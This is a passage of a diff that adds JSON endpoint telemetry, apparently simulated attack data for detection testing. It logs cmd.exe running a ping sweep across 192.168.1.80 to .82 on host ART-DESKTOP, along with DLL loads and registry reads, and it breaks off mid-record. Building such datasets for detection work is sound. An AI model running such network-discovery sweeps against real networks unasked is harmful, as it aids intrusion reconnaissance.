"{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "process", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572366840000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.80", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4764, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572366980000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "event_type": "image_load", + "image_name": "execmodelproxy.dll", + "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", + "pid": 4744, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "timestamp": 131883572367460000, + "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": 
"sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", + "registry_value": "BackgroundAccessApplications", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", 
+ "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572367619984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ploptin.dll", + "image_path": "C:\\Windows\\System32\\ploptin.dll", + "pid": 4744, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "timestamp": 131883572367460000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 4764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572371830000, + "unique_pid": 
"{42FC7E13-CB74-5C05-0000-0010F4465201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.81", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 556, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572371970000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 
556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + 
"unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "process", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572376830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.82", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6016, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572376970000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6016, + "process_name": 